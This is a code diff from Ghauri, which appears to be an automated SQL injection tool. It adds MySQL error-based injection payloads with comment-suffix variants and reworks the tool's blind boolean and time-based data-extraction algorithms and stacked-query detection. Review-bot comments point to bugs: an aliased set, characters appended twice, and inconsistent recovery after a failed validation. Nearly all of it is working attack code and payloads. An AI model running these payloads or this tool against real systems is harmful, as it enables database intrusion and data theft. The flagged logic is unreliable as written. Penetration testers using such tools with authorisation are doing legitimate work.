    628  - {
    629  - "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
    630  - "comments": [
    631  - # {"pref": " ", "suf": ""},
    632  - {"pref": " ", "suf": "-- wXyW"},
    633  - # {"pref": "' ", "suf": ""},
    634  - {"pref": "' ", "suf": "-- wXyW"},
    635  - # {"pref": '" ', "suf": ""},
    636  - {"pref": '" ', "suf": "-- wXyW"},
    637  - # {"pref": ") ", "suf": ""},
    638  - {"pref": ") ", "suf": "-- wXyW"},
    639  - # {"pref": "') ", "suf": ""},
    640  - {"pref": "') ", "suf": "-- wXyW"},
    641  - # {"pref": '") ', "suf": ""},
    642  - {"pref": '") ', "suf": "-- wXyW"},
    643  - ],
    644  - "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)",
    645  - "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
    646  - "dbms": "MySQL",
    647  - },
    648  - {
    649  - "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
    650  - "comments": [
    651  - # {"pref": " ", "suf": ""},
    652  - {"pref": " ", "suf": "-- wXyW"},
    653  - # {"pref": "' ", "suf": ""},
    654  - {"pref": "' ", "suf": "-- wXyW"},
    655  - # {"pref": '" ', "suf": ""},
    656  - {"pref": '" ', "suf": "-- wXyW"},
    657  - # {"pref": ") ", "suf": ""},
    658  - {"pref": ") ", "suf": "-- wXyW"},
    659  - # {"pref": "') ", "suf": ""},
    660  - {"pref": "') ", "suf": "-- wXyW"},
    661  - # {"pref": '") ', "suf": ""},
    662  - {"pref": '") ', "suf": "-- wXyW"},
    663  - ],
    664  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)",
    665  - "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    666  - "dbms": "MySQL",
    667  - },
    668  - {
    669  - "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
    670  - "comments": [
    671  - # {"pref": " ", "suf": ""},
    672  - {"pref": " ", "suf": "-- wXyW"},
    673  - # {"pref": "' ", "suf": ""},
    674  - {"pref": "' ", "suf": "-- wXyW"},
    675  - # {"pref": '" ', "suf": ""},
    676  - {"pref": '" ', "suf": "-- wXyW"},
    677  - # {"pref": ") ", "suf": ""},
    678  - {"pref": ") ", "suf": "-- wXyW"},
    679  - # {"pref": "') ", "suf": ""},
    680  - {"pref": "') ", "suf": "-- wXyW"},
    681  - # {"pref": '") ', "suf": ""},
    682  - {"pref": '") ', "suf": "-- wXyW"},
    683  - ],
    684  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)",
    685  - "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    686  - "dbms": "MySQL",
    687  - },
    688  - {
    689  - "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)",
    690  - "comments": [
    691  - # {"pref": " ", "suf": ""},
    692  - {"pref": " ", "suf": "-- wXyW"},
    693  - # {"pref": "' ", "suf": ""},
    694  - {"pref": "' ", "suf": "-- wXyW"},
    695  - # {"pref": '" ', "suf": ""},
    696  - {"pref": '" ', "suf": "-- wXyW"},
    697  - # {"pref": ") ", "suf": ""},
    698  - {"pref": ") ", "suf": "-- wXyW"},
    699  - # {"pref": "') ", "suf": ""},
    700  - {"pref": "') ", "suf": "-- wXyW"},
    701  - # {"pref": '") ', "suf": ""},
    702  - {"pref": '") ', "suf": "-- wXyW"},
    703  - ],
    704  - "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
    705  - "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
     793 + "title": "MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
     794 + "vector": "AND UPDATEXML(0,CONCAT_WS('(', '~',[INFERENCE],'~'),0)",
    706 795   "dbms": "MySQL",
    707 796   },
    708 797   {
    skipped 1 lines
    710 799   "comments": [
    711 800   # {"pref": " ", "suf": ""},
    712 801   {"pref": " ", "suf": "-- wXyW"},
     802 + {"pref": " ", "suf": "#"},
    713 803   # {"pref": "' ", "suf": ""},
    714 804   {"pref": "' ", "suf": "-- wXyW"},
     805 + {"pref": "' ", "suf": "#"},
    715 806   # {"pref": '" ', "suf": ""},
    716 807   {"pref": '" ', "suf": "-- wXyW"},
     808 + {"pref": '" ', "suf": "#"},
    717 809   # {"pref": ") ", "suf": ""},
    718 810   {"pref": ") ", "suf": "-- wXyW"},
     811 + {"pref": ") ", "suf": "#"},
    719 812   # {"pref": "') ", "suf": ""},
    720 813   {"pref": "') ", "suf": "-- wXyW"},
     814 + {"pref": "') ", "suf": "#"},
    721 815   # {"pref": '") ', "suf": ""},
    722 816   {"pref": '") ', "suf": "-- wXyW"},
     817 + {"pref": '") ', "suf": "#"},
    723 818   ],
    724 819   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)",
    725 820   "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
    skipped 4 lines
    730 825   "comments": [
    731 826   # {"pref": " ", "suf": ""},
    732 827   {"pref": " ", "suf": "-- wXyW"},
     828 + {"pref": " ", "suf": "#"},
    733 829   # {"pref": "' ", "suf": ""},
    734 830   {"pref": "' ", "suf": "-- wXyW"},
     831 + {"pref": "' ", "suf": "#"},
    735 832   # {"pref": '" ', "suf": ""},
    736 833   {"pref": '" ', "suf": "-- wXyW"},
     834 + {"pref": '" ', "suf": "#"},
    737 835   # {"pref": ") ", "suf": ""},
    738 836   {"pref": ") ", "suf": "-- wXyW"},
     837 + {"pref": ") ", "suf": "#"},
    739 838   # {"pref": "') ", "suf": ""},
    740 839   {"pref": "') ", "suf": "-- wXyW"},
     840 + {"pref": "') ", "suf": "#"},
    741 841   # {"pref": '") ', "suf": ""},
    742 842   {"pref": '") ', "suf": "-- wXyW"},
     843 + {"pref": '") ', "suf": "#"},
    743 844   ],
    744 845   "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
    745 846   "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
    skipped 4 lines
    750 851   "comments": [
    751 852   # {"pref": " ", "suf": ""},
    752 853   {"pref": " ", "suf": "-- wXyW"},
     854 + {"pref": " ", "suf": "#"},
    753 855   # {"pref": "' ", "suf": ""},
    754 856   {"pref": "' ", "suf": "-- wXyW"},
     857 + {"pref": "' ", "suf": "#"},
    755 858   # {"pref": '" ', "suf": ""},
    756 859   {"pref": '" ', "suf": "-- wXyW"},
     860 + {"pref": '" ', "suf": "#"},
    757 861   # {"pref": ") ", "suf": ""},
    758 862   {"pref": ") ", "suf": "-- wXyW"},
     863 + {"pref": ") ", "suf": "#"},
    759 864   # {"pref": "') ", "suf": ""},
    760 865   {"pref": "') ", "suf": "-- wXyW"},
     866 + {"pref": "') ", "suf": "#"},
    761 867   # {"pref": '") ', "suf": ""},
    762 868   {"pref": '") ', "suf": "-- wXyW"},
     869 + {"pref": '") ', "suf": "#"},
    763 870   ],
    764 871   "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)",
    765 872   "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))",
    skipped 4 lines
    770 877   "comments": [
    771 878   # {"pref": " ", "suf": ""},
    772 879   {"pref": " ", "suf": "-- wXyW"},
     880 + {"pref": " ", "suf": "#"},
    773 881   # {"pref": "' ", "suf": ""},
    774 882   {"pref": "' ", "suf": "-- wXyW"},
     883 + {"pref": "' ", "suf": "#"},
    775 884   # {"pref": '" ', "suf": ""},
    776 885   {"pref": '" ', "suf": "-- wXyW"},
     886 + {"pref": '" ', "suf": "#"},
    777 887   # {"pref": ") ", "suf": ""},
    778 888   {"pref": ") ", "suf": "-- wXyW"},
     889 + {"pref": ") ", "suf": "#"},
    779 890   # {"pref": "') ", "suf": ""},
    780 891   {"pref": "') ", "suf": "-- wXyW"},
     892 + {"pref": "') ", "suf": "#"},
    781 893   # {"pref": '") ', "suf": ""},
    782 894   {"pref": '") ', "suf": "-- wXyW"},
     895 + {"pref": '") ', "suf": "#"},
    783 896   ],
    784 897   "title": "MySQL >= 5.1 error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (PROCEDURE ANALYSE)",
    785 898   "vector": "PROCEDURE ANALYSE(UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0),1)",
    skipped 4 lines
    790 903   "comments": [
    791 904   # {"pref": " ", "suf": ""},
    792 905   {"pref": " ", "suf": "-- wXyW"},
     906 + {"pref": " ", "suf": "#"},
    793 907   # {"pref": "' ", "suf": ""},
    794 908   {"pref": "' ", "suf": "-- wXyW"},
     909 + {"pref": "' ", "suf": "#"},
    795 910   # {"pref": '" ', "suf": ""},
    796 911   {"pref": '" ', "suf": "-- wXyW"},
     912 + {"pref": '" ', "suf": "#"},
    797 913   # {"pref": ") ", "suf": ""},
    798 914   {"pref": ") ", "suf": "-- wXyW"},
     915 + {"pref": ") ", "suf": "#"},
    799 916   # {"pref": "') ", "suf": ""},
    800 917   {"pref": "') ", "suf": "-- wXyW"},
     918 + {"pref": "') ", "suf": "#"},
    801 919   # {"pref": '") ', "suf": ""},
    802 920   {"pref": '") ', "suf": "-- wXyW"},
     921 + {"pref": '") ', "suf": "#"},
    803 922   ],
    804 923   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    805 924   "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    skipped 4 lines
    810 929   "comments": [
    811 930   # {"pref": " ", "suf": ""},
    812 931   {"pref": " ", "suf": "-- wXyW"},
     932 + {"pref": " ", "suf": "#"},
    813 933   # {"pref": "' ", "suf": ""},
    814 934   {"pref": "' ", "suf": "-- wXyW"},
     935 + {"pref": "' ", "suf": "#"},
    815 936   # {"pref": '" ', "suf": ""},
    816 937   {"pref": '" ', "suf": "-- wXyW"},
     938 + {"pref": '" ', "suf": "#"},
    817 939   # {"pref": ") ", "suf": ""},
    818 940   {"pref": ") ", "suf": "-- wXyW"},
     941 + {"pref": ") ", "suf": "#"},
    819 942   # {"pref": "') ", "suf": ""},
    820 943   {"pref": "') ", "suf": "-- wXyW"},
     944 + {"pref": "') ", "suf": "#"},
    821 945   # {"pref": '") ', "suf": ""},
    822 946   {"pref": '") ', "suf": "-- wXyW"},
     947 + {"pref": '") ', "suf": "#"},
    823 948   ],
    824 949   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)",
    825 950   "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    skipped 959 lines
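--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -324,7 +324,7 @@
 def get_boolean_ratio(w1, w2):
  ratio = 0
  try:
- ratio = round(SequenceMatcher(None, w1, w2).ratio(), 2)
+ ratio = round(SequenceMatcher(None, w1, w2).quick_ratio(), 3)
  except:
  w1 = w1 + " " * (len(w2) - len(w1))
  w2 = w2 + " " * (len(w1) - len(w2))
@@ -459,6 +459,14 @@
  return _temp
  
  
+def extract_page_content(response):
+ response = response or ""
+ regex = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
+ ok = [mobj.group("result").strip() for mobj in re.finditer(regex, response) if mobj]
+ ok = [i for i in ok if i and i != ""]
+ return ok
+ 
+ 
 def check_boolean_responses(
  base,
  attack_true,
@@ -524,6 +532,14 @@
  w2 = attack_false.filtered_text
  ratio_true = get_boolean_ratio(w0, w1)
  ratio_false = get_boolean_ratio(w0, w2)
+ logger.debug(f"ratio false payload attack: {ratio_false}")
+ logger.debug(f"ratio true payload attack: {ratio_true}")
+ if not conf.match_ratio:
+ if ratio_false >= 0.02 and ratio_false <= 0.98:
+ conf.match_ratio = ratio_false
+ logger.debug(
+ f"setting match ratio for current parameter to {conf.match_ratio}"
+ )
  if code:
  if code == sct or code == scf:
  is_vulner = True
@@ -592,40 +608,6 @@
  )
  is_vulner = False
  case = ""
- if w0set == w1set != w2set:
- candidates = w1set - w2set - w0set
- if candidates:
- candidates = sorted(candidates, key=len)
- for candidate in candidates:
- mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
- if (
- mobj
- and " " in candidate
- and candidate.strip()
- and len(candidate) > 10
- ):
- difference = candidate
- string = difference
- is_vulner = True
- case = "Page Ratio"
- break
- if w0set == w2set != w1set:
- candidates = w2set - w1set - w0set
- if candidates:
- candidates = sorted(candidates, key=len)
- for candidate in candidates:
- mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
- if (
- mobj
- and " " in candidate
- and candidate.strip()
- and len(candidate) > 10
- ):
- difference = candidate
- string = difference
- is_vulner = True
- case = "Page Ratio"
- break
  if not difference and not is_vulner:
  # special case when the above page ratio mechanism fails.
  ok = check_page_difference(w1, w2)
@@ -636,6 +618,53 @@
  string = ok.differences.get("string")
  not_string = ok.differences.get("not_string")
  logger.debug(f'injectable with --string="{difference}".')
+ if not difference and not is_vulner:
+ if w0set == w1set != w2set:
+ candidates = w1set - w2set - w0set
+ if candidates:
+ candidates = sorted(candidates, key=len)
+ for candidate in candidates:
+ mobj = re.match(r"\A[\w.,! ]+\Z", candidate)
+ if (
+ mobj
+ and " " in candidate
+ and candidate.strip()
+ and len(candidate) > 10
+ ):
+ difference = candidate
+ string = difference
+ is_vulner = True
+ case = "Page Ratio"
+ break
+ if ratio_true != ratio_false:
+ tset = set(extract_page_content(attack_true.text))
+ tset |= set(__ for _ in tset for __ in _.split())
+ fset = eset = set(extract_page_content(attack_false.text))
+ fset |= set(__ for _ in fset for __ in _.split())
+ eset |= set(__ for _ in eset for __ in _.split())
+ ok = tset - fset - eset
+ candidates = [
+ _.strip()
+ if _.strip() in attack_true.text
+ and _.strip() not in attack_false.text
+ else None
+ for _ in ok
+ ]
+ candidates = [i for i in candidates if i]
+ if candidates:
+ candidates = sorted(candidates, key=len)
+ for candidate in candidates:
+ ok = re.match(r"\A\w{2,}\Z", candidate)
+ if ok:
+ difference = candidate
+ string = conf.string = candidate
+ is_vulner = True
+ break
+ if difference and is_vulner:
+ string = difference
+ not_string = ""
+ case = "Page Ratio"
+ logger.debug(f'injectable with --string="{difference}".')
  if is_vulner:
  logger.debug(f"injectable with cases: '{case}'.")
  _temp = BooleanInjectionResponse(
@@ -748,7 +777,10 @@
  value, backend=None, is_string=False, payload=None, to_str=False, to_char=False
 ):
  if backend == "MySQL":
- return f"0x{binascii.hexlify(value.encode()).decode()}"
+ if to_str:
+ return value
+ else:
+ return f"0x{binascii.hexlify(value.encode()).decode()}"
  if backend == "PostgreSQL":
  return f"({'||'.join([f'CHR({ord(i)})' for i in value.strip()])})"
  if backend == "Microsoft SQL Server":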
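Review bot: `fset = eset = set(extract_page_content(attack_false.text))` binds both names to the same set object, so the in-place `fset |= ...` already mutates `eset`, the following `eset |= ...` is a no-op and `ok = tset - fset - eset` subtracts one set twice; if a separate copy was intended it should be `eset = set(fset)` before the unions, otherwise drop `eset` and the duplicated line. Writing `string = conf.string = candidate` inside the candidate loop stores global state before the candidate is confirmed, and the later `not_string = ""` under `if difference and is_vulner:` appears to discard a `not_string` that `check_page_difference` may have just supplied — the rendered page loses indentation, so whether that block is nested under `if not difference and not is_vulner:` cannot be confirmed here. Separately, `quick_ratio()` in `get_boolean_ratio` is only an upper bound on `ratio()` derived from character counts, so two responses containing the same characters in a different order now score 1.0; a comment such as `# quick_ratio() ignores order (upper bound of ratio()), traded for speed` would record the choice. check_boolean_responses starts and ends outside these hunks.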
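--- a/ghauri/core/extract.py
+++ b/ghauri/core/extract.py
@@ -320,6 +320,7 @@
  expression_payload=None,
  text_only=False,
  retry=3,
+ code=None,
  ):
  # we will validate character indendified in case of boolean based blind sqli only for now..
  is_valid = False
@@ -398,6 +399,9 @@
  attack,
  attack01,
  match_string=match_string,
+ not_match_string=not_match_string,
+ code=code,
+ text_only=text_only,
  )
  result = bool_retval.vulnerable
  if result:
@@ -1670,6 +1674,10 @@
  offset=pos,
  expression_payload=value,
  queryable=entry,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ attack01=attack01,
  )
  if not is_valid:
  logger.warning(
@@ -1729,6 +1737,10 @@
  offset=pos,
  expression_payload=value,
  queryable=entry,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ attack01=attack01,
  )
  if not is_valid:
  logger.warning(
@@ -1786,15 +1798,25 @@
  offset=pos,
  expression_payload=value,
  queryable=entry,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ attack01=attack01,
  )
  if not is_valid:
  logger.warning(
  "invalid character detected, retrying."
  )
  bool_invalid_character_counter += 1
- binary_search = True
- in_based_search = True
- linear_search = False
+ binary_search = (
+ retval_check.binary_search
+ )
+ in_based_search = (
+ retval_check.in_based_search
+ )
+ linear_search = (
+ retval_check.linear_search
+ )
  if is_valid:
  pos += 1
  chars += retval
@@ -1831,14 +1853,62 @@
  break
  if vector_type == "time_vector":
  try:
- if invalid_character_detection_counter >= 1:
- change_algo_on_invalid_character = True
- if not is_change_algo_notified:
- logger.warning(
- "ghauri was not able to guess character, switching algorithm.."
+ if binary_search:
+ retval = self._binary_search(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ delay=delay,
+ timesec=timesec,
+ timeout=timeout,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ suppress_output=suppress_output,
+ query_check=query_check,
+ minimum=32,
+ maximum=127,
+ offset=pos,
+ expression_payload=value,
+ queryable=entry,
+ chars=chars,
+ vector_type=vector_type,
+ )
+ if retval:
+ is_valid = self.validate_character(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ identified_character=retval,
+ vector_type=vector_type,
+ offset=pos,
+ expression_payload=value,
+ queryable=entry,
  )
- is_change_algo_notified = True
- if not change_algo_on_invalid_character:
+ if not is_valid:
+ logger.warning(
+ "invalid character detected, retrying."
+ )
+ invalid_character_detection_counter += 1
+ binary_search = False
+ in_based_search = True
+ linear_search = False
+ if is_valid:
+ pos += 1
+ chars += retval
+ elif in_based_search:
  retval = self._search_using_in_operator(
  url=url,
  data=data,
@@ -1887,6 +1957,9 @@
  "invalid character detected, retrying.."
  )
  invalid_character_detection_counter += 1
+ binary_search = False
+ in_based_search = False
+ linear_search = True
  if is_valid:
  pos += 1
  chars += retval
@@ -1911,10 +1984,52 @@
  list_of_chars=list_of_chars,
  vector_type=vector_type,
  )
+ if retval:
+ is_valid = self.validate_character(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ identified_character=retval,
+ vector_type=vector_type,
+ offset=pos,
+ expression_payload=value,
+ queryable=entry,
+ )
+ if not is_valid:
+ logger.warning(
+ "invalid character detected, retrying.."
+ )
+ invalid_character_detection_counter += 1
+ binary_search = (
+ retval_check.binary_search
+ )
+ in_based_search = (
+ retval_check.in_based_search
+ )
+ linear_search = (
+ retval_check.linear_search
+ )
+ if is_valid:
+ pos += 1
+ chars += retval
  chars += retval
  pos += 1
  try:
- if dump_type:
+ if invalid_character_detection_counter >= 3:
+ logger.debug(
+ "time based technique(s) is not usable to data extraction switching to other if any.."
+ )
+ break
+ if dump_type and chars:
  session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE_UPDATE,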
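Review bot: In the time-vector linear-search path the new `if is_valid: pos += 1; chars += retval` (new lines 2021-2023) is immediately followed by the pre-existing unconditional `chars += retval` / `pos += 1` (2024-2025), so a character that passes validation looks like it is appended twice and one that fails is still appended once; the rendered page drops indentation, so if those two lines now sit in another branch this does not apply, otherwise they should be removed or folded into the `if is_valid:` block. Recovery after a failed validation is also inconsistent between hunks: the boolean branch and the linear branch restore `retval_check.binary_search`/`in_based_search`/`linear_search`, while the new time-based binary-search branch hard-codes `binary_search = False`, `in_based_search = True`, `linear_search = False`, and the time-vector calls to validate_character omit the `code`, `match_string`, `not_match_string` and `attack01` arguments the boolean-vector calls now pass. The comment `# we will validate character indendified in case of boolean based blind sqli only for now..` in the function whose signature gains `code=None` (presumably validate_character) is now stale since the time-vector branches call it too; it could read `# validate a character inferred by boolean- or time-based blind extraction`. The enclosing extraction loop starts and ends outside these hunks.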
    ghauri/core/tests.py
    skipped 917 lines
    918 918   "is_different_status_code_injectable",
    919 919   ],
    920 920   )
     921 + stack_queries_payloads = fetch_db_specific_payload(
     922 + dbms=dbms,
     923 + booleanbased_only=False,
     924 + timebased_only=False,
     925 + stack_queries_only=bool("S" in techniques),
     926 + )
    921 927   time_based_payloads = fetch_db_specific_payload(
    922 928   dbms=dbms,
    923 929   booleanbased_only=False,
    924 930   timebased_only=bool("T" in techniques),
    925  - stack_queries_only=bool("S" in techniques),
     931 + stack_queries_only=False,
    926 932   )
     933 + payloads_response_delay = [stack_queries_payloads, time_based_payloads]
    927 934   param_key = parameter.get("key")
    928 935   param_value = parameter.get("value")
    929 936   sleep_time = random.randint(5, 9)
    skipped 6 lines
    936 943   terminate_on_web_firewall = False
    937 944   http_firewall_code_counter = 0
    938 945   error_msg = None
    939  - for entry in time_based_payloads:
    940  - backend = entry.dbms
    941  - index_of_payload = 0
    942  - retry_on_error = 0
    943  - if terminate_on_web_firewall:
    944  - break
    945  - if terminate_on_errors:
    946  - break
    947  - payloads = fetch_payloads_by_suffix_prefix(
    948  - payloads=entry.payloads, prefix=prefix, suffix=suffix
    949  - )
    950  - total_payloads = len(payloads)
    951  - logger.info(f"testing '{entry.title}'")
    952  - while index_of_payload < total_payloads:
    953  - if http_firewall_code_counter > 2:
    954  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    955  - logger.warning(f"HTTP error code detected during run:")
    956  - choice = logger.read_input(
    957  - f"{message}. Do you want to keep testing the others (if any) [y/N]? ",
    958  - batch=False,
    959  - user_input="N",
    960  - )
    961  - if choice == "n":
    962  - terminate_on_web_firewall = True
    963  - break
    964  - if choice == "y":
    965  - http_firewall_code_counter = 0
    966  - if retry_on_error >= retry:
    967  - logger.warning(f"Ghauri detected connection errors multiple times")
    968  - choice = logger.read_input(
    969  - f"Do you want to keep testing the others (if any) [y/N]? ",
    970  - batch=False,
    971  - user_input="N",
    972  - )
    973  - if choice == "n":
    974  - terminate_on_errors = True
    975  - break
    976  - if choice == "y":
    977  - retry_on_error = 0
    978  - if delay > 0:
    979  - time.sleep(delay)
    980  - _payload = payloads[index_of_payload]
    981  - string = _payload.string
    982  - expression = string.replace("[SLEEPTIME]", "%s" % (sleep_time))
    983  - decoded_expression = urldecode(expression)
    984  - logger.payload(f"{decoded_expression}")
    985  - try:
    986  - attack = inject_expression(
    987  - url=url,
    988  - data=data,
    989  - proxy=proxy,
    990  - delay=delay,
    991  - timesec=timesec,
    992  - timeout=timeout,
    993  - headers=headers,
    994  - parameter=parameter,
    995  - expression=expression,
    996  - is_multipart=is_multipart,
    997  - injection_type=injection_type,
    998  - )
    999  - index_of_payload += 1
    1000  - retry_on_error = 0
    1001  - except KeyboardInterrupt:
    1002  - logger.warning("user aborted during detection phase")
    1003  - quest = logger.read_input(
    1004  - "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] ",
    1005  - batch=False,
    1006  - user_input="S",
    1007  - )
    1008  - if quest and quest == "n":
    1009  - # later on will handle this nicely..
    1010  - return "next parameter"
    1011  - if quest and quest == "q":
    1012  - logger.error("user quit")
    1013  - logger.end("ending")
    1014  - exit(0)
    1015  - if quest and quest == "e":
    1016  - end_detection_phase = True
    1017  - if quest and quest == "s":
    1018  - break
    1019  - except ConnectionAbortedError as e:
    1020  - logger.critical(
    1021  - f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
    1022  - )
    1023  - retry_on_error += 1
    1024  - except ConnectionRefusedError as e:
    1025  - logger.critical(
    1026  - f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
    1027  - )
    1028  - retry_on_error += 1
    1029  - except ConnectionResetError as e:
    1030  - logger.critical(
    1031  - f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
    1032  - )
    1033  - retry_on_error += 1
    1034  - except Exception as error:
    1035  - logger.critical(
    1036  - f"error {error}, during detection phase. Ghauri is going to retry"
    1037  - )
    1038  - retry_on_error += 1
    1039  - response_time = attack.response_time
    1040  - if response_time < sleep_time and end_detection_phase:
    1041  - return None
    1042  - requests_counter += 1
    1043  - with_status_code_msg = ""
    1044  - with_status_code = attack.status_code
    1045  - if attack.status_code != base.status_code:
    1046  - is_different_status_code_injectable = True
    1047  - if with_status_code == 4001:
    1048  - with_status_code_msg = (
    1049  - f" (with error ReadTimeout on --timeout={timeout})"
     946 + for payloads_delay in payloads_response_delay:
     947 + for entry in payloads_delay:
     948 + backend = entry.dbms
     949 + index_of_payload = 0
     950 + retry_on_error = 0
     951 + if terminate_on_web_firewall:
     952 + break
     953 + if terminate_on_errors:
     954 + break
     955 + payloads = fetch_payloads_by_suffix_prefix(
     956 + payloads=entry.payloads, prefix=prefix, suffix=suffix
     957 + )
     958 + total_payloads = len(payloads)
     959 + logger.info(f"testing '{entry.title}'")
     960 + while index_of_payload < total_payloads:
     961 + if http_firewall_code_counter > 2:
     962 + message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     963 + logger.warning(f"HTTP error code detected during run:")
     964 + choice = logger.read_input(
     965 + f"{message}. Do you want to keep testing the others (if any) [y/N]? ",
     966 + batch=False,
     967 + user_input="N",
    1050 968   )
    1051  - else:
    1052  - with_status_code_msg = f" (with --code={with_status_code})"
    1053  - if attack.status_code in [403, 406] and code and code not in [403, 406]:
    1054  - logger.critical(
    1055  - f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
    1056  - )
    1057  - time.sleep(0.5)
    1058  - error_msg = attack.error_msg
    1059  - http_firewall_code_counter += 1
    1060  - continue
    1061  - logger.debug(f"sleep time: {sleep_time}, response time: {response_time}")
    1062  - if response_time >= sleep_time:
    1063  - is_injected = True
    1064  - _it = injection_type
    1065  - if param_key == "#1*":
    1066  - _it = "URI"
    1067  - if is_multipart:
    1068  - message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1069  - elif is_json:
    1070  - message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1071  - else:
    1072  - message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
    1073  - if with_status_code_msg and "ReadTimeout" in with_status_code_msg:
    1074  - logger.warning(
    1075  - "in case of read timeout performing further tests to confirm if the detected payload is working.."
     969 + if choice == "n":
     970 + terminate_on_web_firewall = True
     971 + break
     972 + if choice == "y":
     973 + http_firewall_code_counter = 0
     974 + if retry_on_error >= retry:
     975 + logger.warning(f"Ghauri detected connection errors multiple times")
     976 + choice = logger.read_input(
     977 + f"Do you want to keep testing the others (if any) [y/N]? ",
     978 + batch=False,
     979 + user_input="N",
    1076 980   )
    1077  - ok = confirm_timebased_sqli(
    1078  - base,
    1079  - parameter,
    1080  - _payload,
    1081  - sleep_time,
    1082  - response_time,
     981 + if choice == "n":
     982 + terminate_on_errors = True
     983 + break
     984 + if choice == "y":
     985 + retry_on_error = 0
     986 + if delay > 0:
     987 + time.sleep(delay)
     988 + _payload = payloads[index_of_payload]
     989 + string = _payload.string
     990 + expression = string.replace("[SLEEPTIME]", "%s" % (sleep_time))
     991 + decoded_expression = urldecode(expression)
     992 + logger.payload(f"{decoded_expression}")
     993 + try:
     994 + attack = inject_expression(
    1083 995   url=url,
    1084 996   data=data,
    1085  - headers=headers,
    1086  - injection_type=injection_type,
    1087 997   proxy=proxy,
    1088  - is_multipart=is_multipart,
    1089  - timeout=timeout,
    1090 998   delay=delay,
    1091 999   timesec=timesec,
    1092  - is_read_timedout=True,
    1093  - vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1000 + timeout=timeout,
     1001 + headers=headers,
     1002 + parameter=parameter,
     1003 + expression=expression,
     1004 + is_multipart=is_multipart,
     1005 + injection_type=injection_type,
     1006 + )
     1007 + index_of_payload += 1
     1008 + retry_on_error = 0
     1009 + except KeyboardInterrupt:
     1010 + logger.warning("user aborted during detection phase")
